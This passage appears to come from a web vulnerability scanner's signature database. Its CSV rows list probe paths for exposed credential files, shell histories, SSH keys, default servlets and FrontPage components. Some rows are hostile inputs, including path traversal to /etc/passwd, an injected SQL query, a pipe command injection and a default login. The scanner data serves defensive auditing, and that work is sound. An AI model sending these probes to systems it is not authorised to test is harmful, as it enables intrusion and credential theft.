"002653","","1","@CGIDIRSbb-replog.sh","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002654","","1","@CGIDIRSbbs_forum.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002655","","1","@CGIDIRSbuild.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002656","","1","@CGIDIRSbulk/bulk.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002657","","1","@CGIDIRScached_feed.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002658","","1","@CGIDIRScalender_admin.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002659","","1","@CGIDIRScartmanager.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002660","","1","@CGIDIRScbmc/forums.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002661","","1","@CGIDIRScgforum.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002662","","1","@CGIDIRSchange-your-password.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002663","","1","@CGIDIRSclickresponder.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002664","","1","@CGIDIRScommandit.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002665","","1","@CGIDIRScounter-ord","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002666","","1","@CGIDIRScounterbanner","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002667","","1","@CGIDIRScounterbanner-ord","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002668","","1","@CGIDIRScounterfiglet-ord","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002669","","1","@CGIDIRScounterfiglet/nc/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002670","","1","@CGIDIRSCSMailto.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002671","","1","@CGIDIRSCSMailto/CSMailto.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002672","","1","@CGIDIRScsNews.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002673","","1","@CGIDIRScsPassword.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002674","","1","@CGIDIRScsPassword/csPassword.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002675","","1","@CGIDIRScutecast/members/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002676","","1","@CGIDIRSday5datanotifier.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002677","","1","@CGIDIRSdb2www/library/document.d2w/show","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002678","","1","@CGIDIRSdb_manager.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002679","","1","@CGIDIRSDCFORMS98.CGI","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002680","","1","@CGIDIRSdnewsweb","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002681","","1","@CGIDIRSdonothing","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002682","","1","@CGIDIRSezshopper2/loadpage.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002683","","1","@CGIDIRSezshopper3/loadpage.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002684","","1","@CGIDIRSif/admin/nph-build.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002685","","1","@CGIDIRSikonboard/help.cgi?","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002686","","1","@CGIDIRSimageFolio.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002687","","1","@CGIDIRSimagefolio/admin/admin.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002688","","1","@CGIDIRSjournal.cgi?folder=journal.cgi%00","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002689","","1","@CGIDIRSmagiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002690","","1","@CGIDIRSmajordomo.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002691","","1","@CGIDIRSmojo/mojo.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002692","","1","@CGIDIRSncommerce3/ExecMacro/macro.d2w/%0a%0a","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002693","","1","@CGIDIRSncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002694","","1","@CGIDIRSnon-existent.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002695","","1","@CGIDIRSnph-exploitscanget.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002696","","1","@CGIDIRSnph-maillist.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002697","","1","@CGIDIRSparse-file","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002698","","1","@CGIDIRSphp-cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002699","","1","@CGIDIRSpollssi.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002700","","1","@CGIDIRSpostcards.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002701","","1","@CGIDIRSprofile.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002702","","1","@CGIDIRSquikstore.cfg","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002703","","1","@CGIDIRSregister.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002704","","1","@CGIDIRSreplicator/webpage.cgi/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002705","","1","@CGIDIRSrightfax/fuwww.dll/?","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002706","","1","@CGIDIRSrmp_query","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002707","","1","@CGIDIRSrobpoll.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002708","","1","@CGIDIRSscripts/*%0a.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002709","","1","@CGIDIRSsimplestguest.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002710","","1","@CGIDIRSsimplestmail.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002711","","1","@CGIDIRSstatusconfig.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002712","","1","@CGIDIRSsws/manager.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002713","","1","@CGIDIRStexis/phine","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002714","","1","@CGIDIRSUpload.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002715","","1","@CGIDIRSutm/admin","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002716","","1","@CGIDIRSutm/utm_stat","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002717","","1","/ows-bin/oaskill.exe?abcde.exe","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002718","","1","/ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002719","","1","@CGIDIRS_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002720","","1","@CGIDIRS_vti_pvt/doctodep.btr","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002721","","1","@CGIDIRScfgwiz.exe","GET","200","","","","","cfgwiz.exe is a Norton Anti-Virus file and should not be available via the web site.","","" "002722","","1","@CGIDIRSCgitest.exe","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002723","","1","@CGIDIRSmailform.exe","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002724","","1","@CGIDIRSms_proxy_auth_query/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002725","","1","@CGIDIRSpost16.exe","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002726","","2","/oem_webstage/oem.conf","GET","DocumentRoot","","","","","Oracle reveals a portion of the Apache httpd.conf file.","","" "002727","","2","/database/","GET","200","","","","","Database directory found.","","" "002728","","2","/demo/sql/index.jsp","GET","JSP SQL Samples","","","","","This default may allow connectivity to the Oracle databases.","","" "002729","","23","@CGIDIRS.htaccess","GET","200","","","","","Contains authorization information","","" "002730","","23","@CGIDIRS.htaccess.old","GET","200","","","","","Backup/Old copy of .htaccess - Contains authorization information","","" "002731","","23","@CGIDIRS.htaccess.save","GET","200","","","","","Backup/Old copy of .htaccess - Contains authorization information","","" "002732","","23","@CGIDIRS.htaccess~","GET","200","","","","","Backup/Old copy of .htaccess - Contains authorization information","","" "002733","","23","@CGIDIRS.htpasswd","GET","200","","","","","Contains authorization information","","" "002734","","23","@CGIDIRS.passwd","GET","200","","","","","Contains authorization information","","" "002735","","3","/.wwwacl","GET","200","","","","","Contains authorization information","","" "002736","","3","/.www_acl","GET","200","","","","","Contains authorization information","","" "002737","","3","@CGIDIRS.wwwacl","GET","200","","","","","Contains authorization information","","" "002738","","3","@CGIDIRS.www_acl","GET","200","","","","","Contains authorization information","","" "002739","","3","/.htpasswd","GET",".:.+","","200","","","Contains authorization information","","" "002740","","3","/.access","GET","200","","","","","Contains authorization information","","" "002741","","3","/.addressbook","GET","200","","","","","PINE addressbook, may store sensitive e-mail address contact information and notes","","" "002742","","3","/.bashrc","GET","200","","","","","User home dir was found with a shell rc file. This may reveal file and path information.","","" "002743","","3","/.bash_history","GET","^(grep|cat|dir|ifconfig|history|vim|touch|head|tail)","","200","","","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.","","" "002744","","3","/.forward","GET","200","","","","","User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.","","" "002745","","3","/.history","GET","200","","","","","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.","","" "002746","","3","/.htaccess","GET","200","<files","","","","Contains configuration and/or authorization information","","" "002747","","3","/.lynx_cookies","GET","200","","","","","User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.","","" "002748","","3","/.mysql_history","GET","^(INSERT|insert|delete|DELETE|drop|DROP|grant|GRANT|select|SELECT)","","200","","","Database SQL?","","" "002749","","3","/.passwd","GET","200","","","","","Contains authorization information","","" "002750","","3","/.pinerc","GET","200","","","","","User home dir found with a PINE rc file. May reveal system information, directories and more.","","" "002751","","3","/.plan","GET","200","","","","","User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol.","","" "002752","","3","/.proclog","GET","200","","","","","User home dir with a Procmail log file. May reveal user mail traffic, directories and more.","","" "002753","","3","/.procmailrc","GET","200","","","","","User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.","","" "002754","","3","/.profile","GET","200","","","","","User home dir with a shell profile was found. May reveal directory information and system configuration.","","" "002755","","3","/.rhosts","GET","200","","","","","A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.","","" "002756","","3","/.sh_history","GET","^(grep|cat|dir|ifconfig|history|vim|touch|head|tail)","","200","","","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.","","" "002757","","3","/.ssh","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "002758","","3","/.ssh/authorized_keys","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "002759","","3","/.ssh/known_hosts","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "002760","CVE-2000-0079","3","@CGIDIRSls","GET","neither '\/","","","","","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained.","","" "002761","https://www.securitytracker.com/id/1008523","7","////../../data/config/microsrv.cfg","GET","HostName","","","","","Xerox WorkCentre allows any file to be retrieved remotely.","","" "002762","https://www.securitytracker.com/id/1008523","7","////////../../../../../../etc/passwd","GET","root:","","","","","Xerox WorkCentre allows any file to be retrieved remotely.","","" "002763","https://en.wikipedia.org/wiki/Microsoft_FrontPage","b","/_vti_bin/shtml.exe/_vti_rpc","GET","200","","","","","FrontPage may be installed.","","" "002764","CWE-552","2","/doc/rt/overview-summary.html","GET","Packages","","Oracle Business Components","","","Oracle Business Components for Java docs is running.","","" "002765","CWE-552","2","/docs/sdb/en/html/index.html","GET","Support Database","","","","","This may be a default SuSe Apache install. This is the support page.","","" "002766","CWE-552","2","/jservdocs/","GET","200","","","","","Default Apache JServ docs should be removed.","","" "002767","CWE-552","2","/test/jsp/buffer1.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002768","CWE-552","2","/test/jsp/buffer2.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002769","CWE-552","2","/test/jsp/buffer3.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002770","CWE-552","2","/test/jsp/buffer4.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002771","CWE-552","2","/test/jsp/declaration/IntegerOverflow.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002772","CWE-552","2","/test/jsp/extends1.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002773","CWE-552","2","/test/jsp/extends2.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002774","CWE-552","2","/test/jsp/Language.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002775","CWE-552","2","/test/jsp/pageAutoFlush.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002776","CWE-552","2","/test/jsp/pageDouble.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002777","CWE-552","2","/test/jsp/pageExtends.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002778","CWE-552","2","/test/jsp/pageImport2.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002779","CWE-552","2","/test/jsp/pageInfo.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002780","CWE-552","2","/test/jsp/pageInvalid.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002781","CWE-552","2","/test/jsp/pageIsErrorPage.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002782","CWE-552","2","/test/jsp/pageIsThreadSafe.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002783","CWE-552","2","/test/jsp/pageSession.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002784","CWE-552","2","/test/realPath.jsp","GET","WEBROOT","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","","" "002785","CWE-552","2","/tomcat-docs/index.html","GET","200","","","","","Default Apache Tomcat documentation found.","","" "002786","CWE-552","2","@CGIDIRStest-cgi.bat","GET","200","","","","","This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser.","","" "002787","CWE-552","2","/akopia/","GET","200","","","","","Akopia is installed.","","" "002788","CWE-552","2","/bc4j.html","GET","Business Components","","","","","Default Oracle page, may allow limited administration.","","" "002789","CWE-552","2","/dms0","GET","DMSDUMP","","","","","Default Oracle 9iAS allows access to Dynamic Monitoring Services","","" "002790","CWE-552","2","/jspdocs/","GET","OracleJSP","","","","","Default Oracle JSP documentation.","","" "002791","CWE-552","2","/mod_ose_docs","GET","Oracle Servlet Engine","","","","","Default Oracle documentation found.","","" "002792","CWE-552","2","/ojspdemos/basic/hellouser/hellouser.jsp","GET","200","License Exception","","","","Oracle 9i default JSP page found, may be vulnerable to XSS in any field.","","" "002793","CWE-552","2","/ojspdemos/basic/simple/usebean.jsp","GET","200","License Exception","","","","Oracle 9i default JSP page found, may be vulnerable to XSS in any field.","","" "002794","CWE-552","2","/ojspdemos/basic/simple/welcomeuser.jsp","GET","200","License Exception","","","","Oracle 9i default JSP page found, may be vulnerable to XSS in any field.","","" "002795","CWE-552","2","/oprocmgr-status","GET","Module Name","","","","","Oracle 9iAS default install allows access to the Java Process Manager.","","" "002796","CWE-552","2","/php/index.php","GET","200","","","","","Monkey Http Daemon default PHP file found.","","" "002797","CWE-552","2","/pls/portal30/admin_/","GET","Gateway Configuration Menu","","","","","Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface.","","" "002798","CWE-552","2","/pls/simpledad/admin_/","GET","Gateway Configuration Menu","","","","","This default may allow limited administration of the Oracle server.","","" "002799","CWE-552","2","/pls/simpledad/admin_/gateway.htm?schema=sample","GET","Gateway Configuration Menu","","","","","This default may allow limited administration of the Oracle server.","","" "002800","CWE-552","2","/pls/simpledad/admin_/globalsettings.htm","GET","edit global gateway","","","","","Oracle admin script allows modification of database information.","","" "002801","CWE-552","2","/search/","GET","Sample Search Interface","","","","","Default iPlanet search is enabled.","","" "002802","CWE-552","2","/servlet/Counter","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","","" "002803","CWE-552","2","/servlet/DateServlet","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","","" "002804","CWE-552","2","/servlet/FingerServlet","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","","" "002805","CWE-552","2","/servlet/HelloWorldServlet","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","","" "002806","CWE-552","2","/servlet/IsItWorking","GET","Yes, It's working","","","","","Default Java (JServ) pages are present.","","" "002807","CWE-552","2","/servlet/SessionServlet","GET","200","Error Occurred","","","","JRun or Netware WebSphere default servlet found. All default code should be removed from servers.","","" "002808","CWE-552","2","/servlet/SimpleServlet","GET","200","Error Occurred","","","","JRun default servlet found (possibly Websphere). All default code should be removed from servers.","","" "002809","CWE-552","2","/servlet/SnoopServlet","GET","200","Error Occurred","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","","" "002810","CWE-552","2","/xdk/","GET","Oracle XML Development","","","","","Default Oracle documentation found.","","" "002811","CWE-552","2","/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS","GET","USERNAME","","","","","This allows attackers to perform queries to the Oracle database. This sample app should be removed.","","" "002812","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/admcgi/contents.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002813","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/admcgi/scripts/Fpadmcgi.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002814","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/admisapi/fpadmin.htm","GET","200","","","","","Default FrontPage file found.","","" "002815","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/admin.pl","GET","200","","","","","Default FrontPage CGI found.","","" "002816","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002817","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002818","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/contents.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002819","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002820","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002821","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/bin/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002822","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/admin.pl","GET","200","","","","","Default FrontPage CGI found.","","" "002823","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002824","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002825","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/contents.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002826","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002827","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002828","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/cgi-bin/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002829","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/admin.pl","GET","200","","","","","Default FrontPage CGI found.","","" "002830","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002831","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002832","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/contents.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002833","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002834","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/fpcount.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002835","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002836","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/scripts/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002837","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/","GET","200","","","cannot be displayed","","FrontPage directory found.","","" "002838","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/orders.htm","GET","200","","","cannot be displayed","","Default FrontPage file found.","","" "002839","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/orders.txt","GET","200","","","cannot be displayed","","Default FrontPage file found.","","" "002840","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/register.htm","GET","200","","","cannot be displayed","","Default FrontPage file found.","","" "002841","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/register.txt","GET","200","","","cannot be displayed","","Default FrontPage file found.","","" "002842","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/registrations.htm","GET","200","","cannot be displayed","","","Default FrontPage file found.","","" "002843","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/registrations.txt","GET","200","","","cannot be displayed","","Default FrontPage file found.","","" "002844","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_private/_vti_cnf/","GET","200","","","cannot be displayed","","FrontPage directory found.","","" "002845","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/","GET","200","","","","","FrontPage directory found.","","" "002846","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/admin.pl","GET","200","","","","","Default FrontPage CGI found.","","" "002847","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002848","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002849","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/contents.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002850","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","","" "002851","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002852","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","","" "002853","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_bin/_vti_cnf/","GET","200","","","","","FrontPage directory found.","","" "002854","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_cnf/_vti_cnf/","GET","200","","","","","FrontPage directory found.","","" "002855","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_inf.html","GET","FPVersion=","","","","","FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).","","" "002856","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_log/_vti_cnf/","GET","200","","","","","FrontPage directory found.","","" "002857","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_pvt/administrators.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","","" "002858","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_pvt/authors.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","","" "002859","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_pvt/service.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","","" "002860","https://en.wikipedia.org/wiki/Microsoft_FrontPage","2","/_vti_pvt/users.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","","" "002861","CWE-552","2","/manual/servlets/scripts/servlet1/servform.htm","GET","invokes a servlet","","","","","iPlanet default servlet found. All default code should be removed.","","" "002862","CWE-552","2","/manual/servlets/scripts/shoes/shoeform.htm","GET","invokes a jsp","","","","","iPlanet default servlet found. All default code should be removed.","","" "002863","CWE-552","2","/examples/","GET","Servlet Samples","","","","","JEUS default servlet example pages present","","" "002864","CWE-552","2","/examples/context","GET","Context servlet","","","","","JEUS default servlet examples disclose server directory","","" "002865","CWE-552","2","/examples/forward1","GET","Forward1 servlet","","","","","JEUS default servlet example","","" "002866","CWE-552","2","/examples/forward2","GET","Forward2 servlet","","","","","JEUS default servlet example","","" "002867","CWE-552","2","/examples/header","GET","Header servlet","","","","","JEUS default servlet example","","" "002868","CWE-552","2","/examples/include1","GET","Include1 servlet","","","","","JEUS default servlet example","","" "002869","CWE-552","2","/examples/info","GET","Info servlet","","","","","JEUS default servlet example","","" "002870","CWE-552","2","/examples/jsp/index.html","GET","JSP Samples","","","","","Tomcat or JEUS default JSP pages present.","","" "002871","CWE-552","2","/help/contents.htm","GET","200","","","","","Default Netscape manual found. All default pages should be removed.","","" "002872","CWE-552","2","/help/home.html","GET","200","","","","","Default Netscape manual found. All default pages should be removed.","","" "002873","CWE-552","2","/manual/ag/esperfrm.htm","GET","200","","","","","Default Netscape manual found. All default pages should be removed.","","" "002874","CWE-552","2","/nethome/","GET","200","","","","","Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.","","" "002875","CWE-552","2","/com/novell/gwmonitor/help/en/default.htm","GET","200","","","","","Netware gateway monitor access documentation found. All default documentation should be removed from web servers.","","" "002876","CWE-552","2","/com/novell/webaccess/help/en/default.htm","GET","200","","","","","Netware web access documentation found. All default documentation should be removed from web servers.","","" "002877","CWE-552","2","/com/novell/webpublisher/help/en/default.htm","GET","200","","","","","Netware web publisher documentation found. All default documentation should be removed from web servers.","","" "002878","CWE-552","2","/servlet/AdminServlet","GET","200","","","<title>Axis<\/title>","","Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.","","" "002879","CWE-552","2","/servlet/gwmonitor","GET","200","","","","","Netware Gateway monitor found. All default code should be removed from web servers.","","" "002880","CWE-552","2","/servlet/PrintServlet","GET","200","","","","","Novell Netware default servlet found. All default code should be removed from the system.","","" "002881","CWE-552","2","/servlet/SearchServlet","GET","200","","","","","Novell Netware default servlet found. All default code should be removed from the system.","","" "002882","CWE-552","2","/servlet/ServletManager","GET","401","","","","","Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.","","" "002883","CWE-552","2","/servlet/sq1cdsn","GET","200","","","","","Novell Netware default servlet found. All default code should be removed from the system.","","" 